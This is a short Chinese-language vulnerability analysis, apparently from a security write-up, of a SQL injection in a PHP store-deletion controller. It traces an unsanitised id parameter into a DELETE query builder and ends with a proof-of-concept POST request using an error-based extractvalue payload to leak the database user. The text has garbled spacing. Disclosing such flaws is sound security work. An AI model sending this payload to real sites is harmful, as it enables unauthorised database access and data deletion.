/web/source/mc/store.ctrl.php if($do?=='delete')?{$count?=?pdo_fetchcolumn('SELECT?COUNT(*)?FROM?'?.?tablename('activity_clerks')?.?'?WHERE?uniacid?=?:uniacid?AND?storeid?=?:id',?array(':id'?=?$_GPC['id'],?':uniacid'?=?$_W['uniacid']));$co
if($do?=='delete')?{
$count?=?pdo_fetchcolumn('SELECT?COUNT(*)?FROM?'?.?tablename('activity_clerks')?.?'?WHERE?uniacid?=?:uniacid?AND?storeid?=?:id',?array(':id'?=>?$_GPC['id'],?':uniacid'?=>?$_W['uniacid']));
$count?=?intval($count);
if($count?>?0)?{
message("该门店下有{$count}名店员.请将店员变更到其他门店后,再进行删除操作",?referer(),?'error');
}
pdo_delete('activity_stores',array('id'?=>?$_GPC['id'],?'uniacid'?=>?$_W['uniacid']));
message('删除成功',referer(),?'success');
}发现其中对id的获取直接带入pdo_delete中进行操作。查看下pdo_delete怎么进行的
function?pdo_delete($table,?$params?=?array(),?$glue?=?'AND')?{
return?pdo()->delete($table,?$params,?$glue);
}再继续查看下delete函数
public?function?delete($table,?$params?=?array(),?$glue?=?'AND')?{
$condition?=?$this->implode($params,?$glue);
$sql?=?"DELETE?FROM?"?.?$this->tablename($table);
$sql?.=?$condition['fields']???'?WHERE?'.$condition['fields']?:?'';
return?$this->query($sql,?$condition['params']);
}直接是获取相关参数,直接带入表中进行删除动作。既然delete中没有进行任何的非删除之外的动作。就可以直接注入了。直接上poc
http://127.0.0.1/web/index.php?c=mc&a=store&do=delete post id[]=a\&id[]=)?and?extractvalue(1,?concat(0x5c,?(select?user())))--
